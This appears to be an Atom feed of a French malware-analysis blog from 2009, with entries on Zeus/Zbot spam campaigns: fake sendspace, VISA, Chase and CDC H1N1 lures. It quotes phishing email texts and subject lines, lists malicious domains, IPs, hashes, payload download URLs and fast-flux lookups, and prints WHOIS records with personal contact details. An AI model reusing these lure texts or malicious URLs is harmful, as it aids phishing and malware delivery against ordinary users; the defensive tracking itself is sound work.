<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet href="/templates/default/atom.css" type="text/css" ?>

<feed 
   xmlns="http://www.w3.org/2005/Atom"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/">
    <link href="http://mad.internetpol.fr/feeds/atom.xml" rel="self" title="Malware Analysis &amp; Diagnostic" type="application/atom+xml" />
    <link href="http://mad.internetpol.fr/"                        rel="alternate"    title="Malware Analysis &amp; Diagnostic" type="text/html" />
    <link href="http://mad.internetpol.fr/rss.php?version=2.0"     rel="alternate"    title="Malware Analysis &amp; Diagnostic" type="application/rss+xml" />
    <title type="html">Malware Analysis &amp; Diagnostic</title>
    <subtitle type="html">Cellule de veille et d'étude de codes malveillants</subtitle>
    <icon>http://mad.internetpol.fr/templates/default/img/s9y_banner_small.png</icon>
    <id>http://mad.internetpol.fr/</id>
    <updated>2009-12-15T19:26:39Z</updated>
    <generator uri="http://www.s9y.org/" version="1.4">Serendipity 1.4 - http://www.s9y.org/</generator>
    <dc:language>fr</dc:language>

    <entry>
        <link href="http://mad.internetpol.fr/archives/61-ZeusZbot-Vigilance-sur-vos-courriels-avec-des-liens-sendspace.html" rel="alternate" title="Zeus/Zbot: Vigilance sur vos courriels avec des liens sendspace" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-12-15T18:07:00Z</published>
        <updated>2009-12-15T19:26:39Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=61</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=61</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/61-guid.html</id>
        <title type="html">Zeus/Zbot: Vigilance sur vos courriels avec des liens sendspace</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Nouvelle vague de spams qui utilise abusivement <span style="font-weight: bold;">sendspace.com</span>, un site d'hébergement de fichiers populaire (<span style="font-style: italic;">rank 418 chez Alexa</span>).<br /> 
Les emails sont beaucoup moins recherchés que les précédents, un simple message &quot;<span style="font-style: italic;">hey, is this photo yours?</span>&quot; accompagné d'un lien.<br />http://www.sendspacecom.../file/share/upload.php?file_id=...&amp;email=...@... <p><img alt="NS des DNS en FF" src="http://mad.internetpol.fr/imgupz/map_hetn9_.com.gif" /><br /></p> 
<p><a title="Fake SendSpace" target="_blank" href="http://mad.internetpol.fr/imgupz/fake_sendspace_com.gif"><img border="0" alt="Zeus Zbot Campaign Fake SendSpace" src="http://mad.internetpol.fr/imgupz/fake_sendspace_com.gif" /></a><br /></p> 
<p>L'utilisateur est invité à télécharger la prétendue photo, en réalité il s'agit d'un programme: &quot;photo<span style="font-weight: bold;">.exe</span>&quot; (détections: <a title="VirusTotal : 2009.12.15 18:58:20 (UTC) - 3/41" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=833&amp;entry_id=61"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/47adeeb8b93fc9133e8e11e67bc2e552d921386fe423056498a79a292c9a9223-1260903500';return true;" onmouseout="window.status='';return true;">2009.12.15 18:58:20 (UTC) - 3/41 soit 7.32% des antivirus</a> - MD5: <a title="ThreatExpert MD5: 79d4a5135afd7b96048f1b0a1ecac6ee" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=834&amp;entry_id=61"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=79d4a5135afd7b96048f1b0a1ecac6ee';return true;" onmouseout="window.status='';return true;">79d4a5135afd7b96048f1b0a1ecac6ee</a>) ; <span style="text-decoration: underline;">la fausse page contient également une iframe piégée invisible</span> sur:<span style="font-style: italic;"> </span><span style="color: #e10e0e; font-weight: bold; font-family: courier new,courier,monospace;">gerolli.org.uk</span> (<span style="font-family: courier new,courier,monospace;">91.200.164.82 [91.200.164.0/22] <a title="Categorie: Zeus - Sujet: VISA - IP: 91.200.164.82 ( bersdf.com ) - ( gerolli.eu ; audiodrv7.com )" target="_blank" href="http://mad.internetpol.fr/archives/60-ZeusZbot-Usage-frauduleux-de-votre-carte-bancaire-VISA.html">AS47560</a></span> ( <a style="font-family: tahoma,arial,helvetica,sans-serif;" title="Wepawet: Analysis of gerolli.org.uk" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=836&amp;entry_id=61"  onmouseover="window.status='http://wepawet.iseclab.org/view.php?hash=b130b65ad0d7f05d8faaa255fc4fe50e&amp;amp;t=1260898574&amp;amp;type=js';return true;" onmouseout="window.status='';return true;">consulter l'analyse de l'iframe</a>&#160; )) si la machine est vulnérable, cela entraine le téléchargement d'un programme. (détections: <a title="VirusTotal : 2009.12.15 17:27:02 (UTC) - 4/40" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=837&amp;entry_id=61"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/1cb2b1913d2d9887454b33d519ab08a06407c15768348ca31ea001c796ed4d08-1260898022';return true;" onmouseout="window.status='';return true;">2009.12.15 17:27:02 (UTC) - 4/40 soit 10% des antivirus</a> : MD5 <a title="ThreatExpert MD5: 79d4ac91a361f1bb991c7c7d195a99bd" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=838&amp;entry_id=61"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=79d4ac91a361f1bb991c7c7d195a99bd';return true;" onmouseout="window.status='';return true;">79d4ac91a361f1bb991c7c7d195a99bd)</a> &lt;- CONCLUSION -&gt; <span style="font-weight: bold;">Low Antivirus Detection Rates !</span><br /></p> 
<p><br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/60-ZeusZbot-Usage-frauduleux-de-votre-carte-bancaire-VISA.html" rel="alternate" title="Zeus/Zbot: Usage frauduleux de votre carte bancaire VISA ?" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-12-13T02:17:00Z</published>
        <updated>2009-12-21T22:17:26Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=60</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=60</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/60-guid.html</id>
        <title type="html">Zeus/Zbot: Usage frauduleux de votre carte bancaire VISA ?</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p style="text-align: left; font-weight: bold;"> <img align="left" src="imgupz/visa.gif" /> </p> 
<p style="text-align: left; font-weight: bold;">&#160;Dear VISA card holder,<br /><br />A recent review of your transaction history determined that your card was used at an ATM located in Anguilla, but for security reasons the requested transaction was refused.<br />Please carefully review electronic report for your VISA card at...</p> 
<p> </p> 
<p> </p> 
<p> </p> <p><span style="text-decoration: underline;">Exemple de sujets utilisés dans les spams :</span><br /></p> 
<ol> 
<li>possible fraudulent transaction</li> 
<li>possible fraudulent transaction occurred</li> 
<li>possible fraudulent transaction is identified</li> 
<li>possible fraudulent transaction and/or collusion</li> 
<li>possible fraudulent transaction has been executed</li> 
<li>possible fraudulent transaction with your VISA card</li> 
<li>possible fraudulent transaction occurred with your VISA card</li> 
<li>possible fraudulent transaction is identified with your VISA card</li> 
<li>possible fraudulent transaction and/or collusion with your VISA card</li> 
<li>possible fraudulent transaction has been executed with your VISA card...</li> 
</ol> 
<p>L'icône du site (<span style="font-style: italic;">shortcut icon</span>) est directement utilisé à partir du véritable site: <span style="font-weight: bold;">visaeurope.com</span></p> 
<p style="text-align: left;"><a title="Zoom" target="_blank" href="http://mad.internetpol.fr/imgupz/normal_zeus_zbot_visa.gif"><img border="0" alt="Zeus Zbot Iframe Exploits Pack VISA campaign" src="http://mad.internetpol.fr/imgupz/mini_zeus_zbot_visa.gif" /></a><span style="font-style: italic;"> (Cliquez sur l'image pour agrandir)</span><br /></p> 
<p>Au moment de l'écriture de ce billet, le programme téléchargé correspond à celui-ci:<br /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/cardstatement.exe.gif" alt="cardstatement.exe" /></p> 
<p> </p> 
<p>Une fois exécuté, il va télécharger ces fichiers:<br /></p> 
<p> </p> 
<p><img src="http://mad.internetpol.fr/imgupz/te_details_4e3f01f78d1b227c7188515a812e1eb12d9fdca3.jpg" alt="Details - sha1:4e3f01f78d1b227c7188515a812e1eb12d9fdca3" /></p> 
<p>Ci-dessous, les informations relatives au nom de domaine.<br /></p> 
<p style="font-family: courier new,courier,monospace;">domain:&#160;&#160;&#160;&#160; <span style="font-weight: bold; color: #960000;">STOMAID.RU</span><br />type:&#160;&#160;&#160;&#160;&#160;&#160; CORPORATE<br />nserver:&#160;&#160;&#160; ns1.stomaid.ru. 193.104.41.130<br />nserver:&#160;&#160;&#160; ns2.stomaid.ru. 91.200.164.34<br />state:&#160;&#160;&#160;&#160;&#160; REGISTERED, DELEGATED, UNVERIFIED<br />person:&#160;&#160;&#160;&#160; Private person<br />phone:&#160;&#160;&#160;&#160;&#160; +380 50 5963256<br />e-mail:&#160;&#160;&#160;&#160; kievsk<span style="font-style: italic;">@</span>yandex.ru<br />registrar:&#160; REGRU-REG-RIPN<br />created:&#160;&#160;&#160; 2009.12.08<br />paid-till:&#160; 2010.12.08<br />source:&#160;&#160;&#160;&#160; TCI</p> 
<p><img src="imgupz/stomaid.ru.gif" /> </p> 
<p> </p> 
<ul> 
<li><span style="font-weight: bold;">AS47560 VESTEH-NET-as ; ORG-VL42-RIPE</span><br />Vesteh LLC<br />Maksim Ananyev<br />5a Polytehnichna str,<br />Kiev, Ukraine<br />+380 44 2464408</li> 
</ul> 
<ul> 
<li><span style="font-weight: bold;">AS49934 VVPN-AS ; ORG-PESV2-RIPE</span><br />PE Evgen Sergeevich Voronov<br />22 Plyazhna str.,<br />Sebastopol, Ukraine<br />+380 67 2307487<br /></li> 
</ul> 
<p>A l'aide de ZeusTracker, il est possible de lister les autres Zbots ayant été découverts sur ces AS:<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=825&amp;entry_id=60"  onmouseover="window.status='https://zeustracker.abuse.ch/monitor.php?as=47560';return true;" onmouseout="window.status='';return true;" target="_blank" title="AS47560 VESTEH-NET-as ; ORG-VL42-RIPE">47560</a><br />- <a title="AS49934 VVPN-AS ; ORG-PESV2-RIPE" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=826&amp;entry_id=60"  onmouseover="window.status='https://zeustracker.abuse.ch/monitor.php?as=49934';return true;" onmouseout="window.status='';return true;">49934</a> </p> 
<p>Toujours dans le code de la page intitulée &quot;<span style="font-weight: bold;">VISA Card Transactions</span>&quot;:<br /></p> 
<p><img alt="botnet exploits pack iframe bersdf com drsfx in.php zeus " src="http://mad.internetpol.fr/imgupz/iframe_bersdf_com_drsfx_in_php.jpg" /></p> 
<p><br /></p> 
<p> </p> 
<p><a title="Click to enlarge - Cliquez pour zoomer" target="_blank" href="http://mad.internetpol.fr/imgupz/stracefull_a204de408548b2d81bc98f8d818df087.gif"><img border="0" alt="strace wepawet bersdf com grsfx in php zeus visa campaign" src="http://mad.internetpol.fr/imgupz/strace_a204de408548b2d81bc98f8d818df087.gif" /></a></p> 
<p> </p> 
<p>Ici, &quot;file.exe&quot; correspond au fichier distant &quot;http://bersdf.com/grsfx/load.php&quot;<br /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/bersdf_com_grsfx_file.gif" alt="bersdf grsfx file exploit iframe zeus zbot" /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/te_details_74ea133e59ba438261ce5dd90a8b1e16b65fcbeb.jpg" alt="Details: sha1:74ea133e59ba438261ce5dd90a8b1e16b65fcbeb" /></p> 
<p><span style="font-family: courier new,courier,monospace;">domain: </span><span style="font-weight: bold; font-family: courier new,courier,monospace; color: #960000;">BERSDF.COM</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">reg_created: 2009-12-02 07:57:17</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">created: 2009-12-02 08:56:32</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">changed: 2009-12-03 19:22:58</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">expires: 2010-12-02 07:57:17</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">ns1.everydns.net 208.76.62.100</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">ns2.everydns.net 78.129.207.168</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">ns3.everydns.net 208.76.63.100</span></p> 
<p><span style="font-family: courier new,courier,monospace;">person: Al Aponas</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">address: 1095 Hwy A1A</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">zipcode: 32937</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">city: Satellite Beach</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">state: Florida</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">country: United States of America</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">phone: +1.5087262585</span></p> 
<ul> 
<li><span style="font-weight: bold;">AS47560 VESTEH-NET-as ; ORG-VL42-RIPE</span><br />
Vesteh LLC<br />
Maksim Ananyev<br />
5a Polytehnichna str,<br />
Kiev, Ukraine<br />
+380 44 2464408 <br /></li> 
</ul> 
<p> <br /></p> 
<p> </p> 
<p><span style="text-decoration: underline;">Liens connexes: </span><br />- <a href="http://mad.internetpol.fr/exit.php?url_id=827&amp;entry_id=60"  onmouseover="window.status='http://blog.spywareguide.com/2009/12/fake-visa-electronic-report-se.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Fake Visa Electronic Report Serves Up Zbot Data Stealer">Fake Visa Electronic Report Serves Up Zbot Data Stealer</a> ( Christopher Boyd (SpywareGuide), December 10, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=828&amp;entry_id=60"  onmouseover="window.status='http://blog.webroot.com/2009/12/11/visa-targeted-again-by-zbot-phishers/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Webroot - Visa Targeted (Again) by Zbot Phishers">Visa Targeted (Again) by Zbot Phishers</a> ( Andrew Brandt (Webroot), December 11, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=830&amp;entry_id=60"  onmouseover="window.status='http://garwarner.blogspot.com/2009/12/ongoing-visa-scam-drop-zeus-zbot.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Ongoing VISA scam drop Zeus Zbot">Ongoing VISA scam drop Zeus Zbot</a> ( Gary Warner (CyberCrime &amp; Doing Time), December 12, 2009 )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=839&amp;entry_id=60"  onmouseover="window.status='http://garwarner.blogspot.com/2009/12/some-updates-visazeus-and-google-jobs.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Some updates ... Visa/Zeus and Google Jobs">Some updates ... Visa/Zeus and Google Jobs</a> ( Gary Warner (CyberCrime &amp; Doing Time), December 21, 2009 )</p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/59-Spam-Phishing-Chase-Bank-Online-Form-COF.html" rel="alternate" title="Spam &amp; Phishing: Chase Bank Online Form (COF)" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-12-02T18:17:00Z</published>
        <updated>2009-12-03T08:57:51Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=59</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=59</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/59-guid.html</id>
        <title type="html">Spam &amp; Phishing: Chase Bank Online Form (COF)</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p><div class="bb-code-title"></div><div class="bb-quote">Note: This is a service message regarding the Chase Customer Form.<br /><br />Dear customer:<br />As part of the new security measures, all Chase bank customers are required to complete Chase Customer Form. Please complete the form as soon as possible. To access the form please click on the following link: <br />http://chaseonline.chase.com/Secure/webform/OSL.aspx?LOB=<br />Thank you for being a valued customer.<br /><br />Sincerely,<br />Chase Customer Service</div></p> <p> </p> 
<p><img alt="Chase Online Form (COF)" src="http://mad.internetpol.fr/imgupz/fake_chase_online.jpg" /><br /></p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #960909;">treffq.be</span></font></strong><br />treffq.be has address ...<br />treffq.be name server <span style="color: #960909;">ns1.a-personalhire.com</span>.<br />
treffq.be name server <span style="color: #960909;">ns2.a-personalhire.com</span>. <br /> </p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #960909;">treffx.be</span></font></strong><br />treffx.be has address ...<br />treffx.be name server <span style="color: #960909;">ns1.a-personalhire.com</span>.<br />
treffx.be name server <span style="color: #960909;">ns2.a-personalhire.com</span>.</p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #960909;">treffb.be</span></font></strong><br />treffb.be has address ...<br />treffb.be name server <span style="color: #960909;">ns1.a-personalhire.com</span>.<br />treffb.be name server <span style="color: #960909;">ns2.a-personalhire.com</span>.<br /></p> 
<p>* a-personalhire.com ( lire: <a title="Malware Analysis &amp; Diagnostic : Emails concernant les vaccinations H1N1" target="_blank" href="http://mad.internetpol.fr/archives/58-ZeusZbot-Mefiance-quant-aux-emails-concernant-les-vaccinations-H1N1.html">Emails concernant les vaccinations H1N1</a> )</p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #960909;">xeasdmi.be</span></font></strong><br />
xeasdmi.be has address ...<br />
xeasdmi.be name server <span style="color: #960909;">ns1.davies-estates.com</span>.<br />
xeasdmi.be name server <span style="color: #960909;">ns2.davies-estates.com</span>.</p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #960909;">xeasdxk.be</span></font></strong><br />xeasdxk.be has address ...<br />xeasdxk.be name server <span style="color: #960909;">ns1.davies-estates.com</span>.<br />xeasdxk.be name server <span style="color: #960909;">ns2.davies-estates.com</span>.</p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #960909;">xeasdxl.be</span></font></strong><br />xeasdxl.be has address ...<br />xeasdxl.be name server <span style="color: #960909;">ns1.davies-estates.com</span>.<br />xeasdxl.be name server <span style="color: #960909;">ns2.davies-estates.com</span>.</p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #960909;">xeasdga.be</span></font></strong><br />xeasdga.be has address ...<br />xeasdga.be name server <span style="color: #960909;">ns1.davies-estates.com</span>.<br />xeasdga.be name server <span style="color: #960909;">ns2.davies-estates.com</span>.</p> 
<p> </p> 
<p> 
Gary Warner - &quot;Chase Bank phish&quot;<br /><a title="Gary Warner - Chase Bank phish [UPDATED]" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=821&amp;entry_id=59"  onmouseover="window.status='http://garwarner.blogspot.com/2009/11/chase-bank-phish.html';return true;" onmouseout="window.status='';return true;">Fresh Domains added December 2, 2009</a><br /> <span style="color: #960909;"><strong>tref</strong>cc<strong>.be</strong> ; trefee.be ; treffb.be ; treffd.be ; treffe.be ;</span><br style="color: #960909;" /><span style="color: #960909;">treffg.be ; treffq.be ; treffr.be ; treffs.be ; treffw.be ;</span><br style="color: #960909;" /><span style="color: #960909;">treffx.be ; <strong>xeasd</strong>aq<strong>.be</strong> ; xeasded.be ; xeasdga.be ; xeasdki.be ;</span><br style="color: #960909;" /><span style="color: #960909;">xeasdla.be ; xeasdmi.be ; xeasdoc.be ; xeasduj.be ; xeasdxk.be ;</span><br style="color: #960909;" /><span style="color: #960909;">xeasdxl.be ; xeasdxt.be ; xeasdxx.be ; xeasdyh.be</span></p> 
Nouvelle série:<br /><font face="courier new,courier,monospace"><strong>host -t ANY <span style="color: #960909;">jerr1ah.be</span></strong></font><br />jerr1ah.be name server <span style="color: #960909;">ns1.daviesproperties.net</span>.<br />jerr1ah.be name server <span style="color: #960909;">ns2.daviesproperties.net</span>.
  

<p><strong style="color: #960909;">jerr1</strong><span style="color: #960909;">ax</span><strong style="color: #960909;">.be</strong><span style="color: #960909;"> ; jerr1ah.be; jerr1aa.be; jerr1ab.be ; jerr1js.be ; </span><br /><span style="color: #960909;">jerr1on.be ; jerr1gt.be ; ... ( </span><em>read also</em>: <a href="http://mad.internetpol.fr/exit.php?url_id=822&amp;entry_id=59"  onmouseover="window.status='http://www.m86security.com/trace/traceitem.asp?article=1193';return true;" onmouseout="window.status='';return true;" target="_blank" title="M86 Security - IRS Scam Now Uses Drive-by Exploit">M86 Security - IRS Scam Now Uses Drive-by Exploit</a> )<br /><br /> </p> 
<p> </p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/58-ZeusZbot-Mefiance-quant-aux-emails-concernant-les-vaccinations-H1N1.html" rel="alternate" title="Zeus/Zbot: Méfiance quant aux emails concernant les vaccinations H1N1" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-12-02T08:01:00Z</published>
        <updated>2009-12-05T13:57:40Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=58</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=58</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/58-guid.html</id>
        <title type="html">Zeus/Zbot: Méfiance quant aux emails concernant les vaccinations H1N1</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p><div class="bb-code-title"></div><div class="bb-quote">You have received this e-mail because of the launching of State Vaccination H1N1 Program.<br /> <br />
You need to create your personal H1N1 (swine flu) Vaccination Profile
on the cdc.gov website. The Vaccination is not obligatory, but every
person that has reached the age of 18 has to have his personal
Vaccination Profile on the cdc.gov site. This profile has to be created
both for the vaccinated people and the not-vaccinated ones. This
profile is used for the registering system of vaccinated and
not-vaccinated people.<br />
Create your Personal H1N1 Vaccination Profile using the link: <span style="text-decoration:underline">Create Personal Profile</span><br /> <br />
<span style="font-style:italic">Centers for Disease Control and Prevention (CDC) · 1600 Clifton Rd ·
Atlanta GA 30333 · 800-CDC-INFO (800-232-4636)</span></div></p> 
<p>Si vous recevez des emails contenant les mots clefs <em>Vaccination, H1N1, Profile, Program</em> et qui imitent le CDC ( <a title="Centers for Disease Control and Prevention" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=792&amp;entry_id=58"  onmouseover="window.status='http://www.cdc.gov/h1n1flu/';return true;" onmouseout="window.status='';return true;"><em>Centers for Disease Control and Prevention</em></a> ) redoublez de prudence.</p> 
<p><br /></p> <p><img src="http://mad.internetpol.fr/imgupz/fake_cdc_personal_h1n1.jpg" alt="Fake CDC Personal H1N1" /><br /></p> 
<p>&#160;Your <strong>Personal H1N1 Vaccinating Profile</strong> is an electronic document, which contains your name, your contact details and your medical data (what kind of illnesses you have sustained in your childhood or what kind of allergy you have to some certain drug). All instructions you need are included in the archive below:<br /><br />Your Temporary ID (valid for 48 hours) H1N1-1574377270<br />Download_Archive (130Kb) http://online.cdc.gov.****/h1n1flu/vacc_profile.exe <br /></p> 
<p><a href="http://mad.internetpol.fr/exit.php?url_id=793&amp;entry_id=58"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=c2b6cb233320a638ffee3229ebfecbe7';return true;" onmouseout="window.status='';return true;" target="_blank" title="c2b6cb233320a638ffee3229ebfecbe7">c2b6cb233320a638ffee3229ebfecbe7</a> : <a href="http://mad.internetpol.fr/exit.php?url_id=794&amp;entry_id=58"  onmouseover="window.status='http://www.virustotal.com/analisis/aca122400bdab492f7eba96fd9742927fdcbd8ed74e6dbd5c172d6ecd6789410-1259693294';return true;" onmouseout="window.status='';return true;" target="_blank" title="2009.12.01 18:48:14 (UTC) - 7/41 (17.07%)">2009.12.01 18:48:14 (UTC) - 7/41 (17.07%)</a> : <a href="http://mad.internetpol.fr/exit.php?url_id=795&amp;entry_id=58"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/aca122400bdab492f7eba96fd9742927fdcbd8ed74e6dbd5c172d6ecd6789410-1259738240';return true;" onmouseout="window.status='';return true;" target="_blank" title="2009.12.02 07:17:20 (UTC) - 16/41 (39.03%)">2009.12.02 07:17:20 (UTC) - 16/41 (39.03%)</a><br /></p> 
<p>Exemples de sujets utilisés dans les emails:<br /><span style="font-family: courier new,courier,monospace;">2 ( 16)&#160;&#160; &#160;2427&#160;&#160; &#160;State Vaccination Program</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">3 ( 78)&#160;&#160; &#160;2374&#160;&#160; &#160;Your personal Vaccination Profile</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">4 ( 29)&#160;&#160; &#160;2354&#160;&#160; &#160;Create your personal Vaccination Profile</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">5 ( 36)&#160;&#160; &#160;2326&#160;&#160; &#160;Instructions on creation of your personal Vaccination Profile</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">6 ( 16)&#160;&#160; &#160;2314&#160;&#160; &#160;State Vaccination H1N1 Program</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">7 ( 25)&#160;&#160; &#160;2267&#160;&#160; &#160;Creation of personal Vaccination Profile</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">8 ( 11)&#160;&#160; &#160;2142&#160;&#160; &#160;Creation of your personal Vaccination Profile</span><br style="font-family: courier new,courier,monospace;" /><span style="font-family: courier new,courier,monospace;">9 ( 27)&#160;&#160; &#160;2051&#160;&#160; &#160;Governmental registration program on the H1N1 vaccination</span></p> 
<p>Comme les campagnes précédentes, on observe différents fichiers et l'utilisation de <strong><acronym title="Fast-Flux Service Networks">FFSN</acronym></strong> <em>( docs: <a href="http://mad.internetpol.fr/exit.php?url_id=796&amp;entry_id=58"  onmouseover="window.status='http://old.honeynet.org/papers/ff/fast-flux.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Honeynet Papers: Fast-Flux">Honeynet Papers</a> + <a title="Measuring and Detecting Fast-Flux Service Networks" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=811&amp;entry_id=58"  onmouseover="window.status='http://pi1.informatik.uni-mannheim.de/filepool/research/publications/fast-flux-ndss08.pdf';return true;" onmouseout="window.status='';return true;">Measuring and Detecting Fast-Flux Service Networks</a> (<a href="http://mad.internetpol.fr/exit.php?url_id=797&amp;entry_id=58"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Mannheim';return true;" onmouseout="window.status='';return true;" target="_blank" title="Université de Mannheim">Université de Mannheim</a>) ) </em></p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #c30000;">yttt4r.org.im</span></font></strong><br /><font size="1">yttt4r.org.im has address 123.236.66.177<br />yttt4r.org.im has address 186.124.142.68<br />yttt4r.org.im has address 186.97.4.224<br />yttt4r.org.im has address 61.223.227.72<br />yttt4r.org.im has address 115.108.66.227<br />yttt4r.org.im has address 59.94.104.36<br />yttt4r.org.im has address 94.129.154.1<br />yttt4r.org.im has address 190.34.29.179<br />yttt4r.org.im has address 124.125.18.54<br />yttt4r.org.im has address 200.42.182.215<br />yttt4r.org.im has address 121.96.221.13<br />yttt4r.org.im has address 217.132.43.36<br />yttt4r.org.im has address 201.227.38.29<br />yttt4r.org.im has address 124.104.193.205<br />yttt4r.org.im has address 117.197.117.223<br />yttt4r.org.im name server <span style="color: #b40000;">ns1.daviesproperties.net</span>.<br />yttt4r.org.im name server <span style="color: #b40000;">ns2.daviesproperties.net</span>.<br />yttt4r.org.im host information &quot;Casio&quot; &quot;Calculator&quot;<br />yttt4r.org.im has SOA record ns2.daviesproperties.net. hostmaster.yttt4r.org.im. 10058 60 120 3600 3600</font></p> 
<p> </p> 
<p><strong><font face="courier new,courier,monospace">host -t ANY <span style="color: #b40000;">yhnbad.co.im</span></font></strong><br />yhnbad.co.im has address 187.10.76.37<br />yhnbad.co.im has address 59.147.12.68<br />yhnbad.co.im has address 196.217.221.240<br />yhnbad.co.im has address 117.194.230.159<br />yhnbad.co.im has address 119.77.251.208<br />yhnbad.co.im has address 61.223.227.72<br />yhnbad.co.im has address 122.218.93.174<br />yhnbad.co.im has address 200.126.86.246<br />yhnbad.co.im has address 217.132.43.36<br />yhnbad.co.im has address 201.42.71.81<br />yhnbad.co.im has address 121.96.99.65<br />yhnbad.co.im has address 112.202.208.222<br />yhnbad.co.im has address 125.202.254.181<br />yhnbad.co.im has address 202.157.51.53<br />yhnbad.co.im has address 220.129.232.106<br />yhnbad.co.im name server <span style="color: #b40000;">ns1.a-personalhire.com</span>.<br />yhnbad.co.im name server <span style="color: #b40000;">ns2.a-personalhire.com</span>.<br />yhnbad.co.im name server <span style="color: #b40000;">ns1.iceagestrem.com</span>.<br />yhnbad.co.im name server <span style="color: #b40000;">ns2.iceagestrem.com</span>.<br /></p> 
